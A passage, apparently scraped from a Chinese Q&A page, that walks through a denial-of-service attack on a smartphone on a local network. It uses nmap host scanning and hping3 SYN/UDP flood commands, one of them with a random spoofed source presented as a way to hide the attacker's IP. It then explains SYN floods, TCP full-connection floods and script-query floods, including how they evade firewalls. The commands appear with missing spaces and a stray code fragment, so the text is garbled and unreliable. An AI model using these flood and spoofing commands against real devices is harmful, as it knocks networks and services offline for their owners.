4.你的目標機器會在5分鍾裡面不堪重負,停止響應。
ok,我們進行簡單的模擬攻擊:
先用nmap掃描內網存活主機
我們的攻擊目標是智能手機。
輸入命令hping -S--flood-V IP 開始攻擊
我們來看看攻擊的效果
ok 這時候手機已經呈現斷網狀態
按下ctrl+c關閉,這時候我們看看發送了多少數據
這個數據包很客觀的了。
另外就是隱藏IP攻擊目標
命令是這樣的:
java">hping3-S-U--flood-V--rand-sourceIP
『柒』 網路安全技術 常見的DDoS攻擊方法有哪些
常見的D
DoS攻擊
方法有:
1、SYN/ACK
Flood攻擊
這種攻擊方法是經典最有效的
DDOS攻擊
方法,可通殺各種系統的網路服務,主要是通過向受害主機發送大量偽造源IP和源埠的SYN或ACK包,導致主機的緩存資源被耗盡或忙於發送回應包而造成
拒絕服務
,由於源都是偽造的故追蹤起來比較困難,缺點是實施起來有一定難度,需要高帶寬的僵屍主機支持。少量的這種攻擊會導致主機伺服器無法訪問,但卻可以Ping的通,在伺服器上用Netstat
-na命令會觀察到存在大量的SYN_RECEIVED狀態,大量的這種攻擊會導致Ping失敗、TCP/IP棧失效,並會出現系統凝固現象,即不響應鍵盤和滑鼠。普通防火牆大多無法抵禦此種攻擊。
2、TCP全連接攻擊
這種攻擊是為了繞過常規防火牆的檢查而設計的,一般情況下,常規防火牆大多具備過濾TearDrop、Land等DOS攻擊的能力,但對於正常的TCP連接是放過的,殊不知很多網路服務程序(如:IIS、Apache等
Web伺服器
)能接受的TCP連接數是有限的,一旦有大量的TCP連接,即便是正常的,也會導致網站訪問非常緩慢甚至無法訪問,TCP全連接攻擊就是通過許多僵屍主機不斷地與受害伺服器建立大量的TCP連接,直到伺服器的內存等資源被耗盡而被拖跨,從而造成拒絕服務,這種攻擊的特點是可繞過一般防火牆的防護而達到攻擊目的,缺點是需要找很多僵屍主機,並且由於僵屍主機的IP是暴露的,因此此種DDOS攻擊方式容易被追蹤。
3、刷Script腳本攻擊
這種攻擊主要是針對存在ASP、JSP、PHP、CGI等
腳本程序
,並調用
MSSQLServer
、MySQLServer、Oracle等資料庫的網站系統而設計的,特徵是和伺服器建立正常的TCP連接,並不斷的向腳本程序提交查詢、列表等大量耗費資料庫資源的調用,典型的以小博大的攻擊方法。一般來說,提交一個GET或POST指令對客戶端的耗費和帶寬的佔用是幾乎可以忽略的,而伺服器為處理此請求卻可能要從上萬條記錄中去查出某個記錄,這種處理過程對資源的耗費是很大的,常見的
資料庫伺服器
很少能支持數百個查詢指令同時執行,而這對於客戶端來說卻是輕而易舉的,因此攻擊者只需通過Proxy代理向主機伺服器大量遞交查詢指令,只需數分鍾就會把伺服器資源消耗掉而導致拒絕服務,常見的現象就是網站慢如蝸牛、
ASP程序
失效、PHP連接資料庫失敗、資料庫主程序佔用CPU偏高。這種攻擊的特點是可以完全繞過普通的防火牆防護,輕松找一些Proxy代理就可實施攻擊,缺點是對付只有
靜態頁面
的網站效果會大打折扣,並且有些Proxy會暴露DDOS攻擊者的IP地址。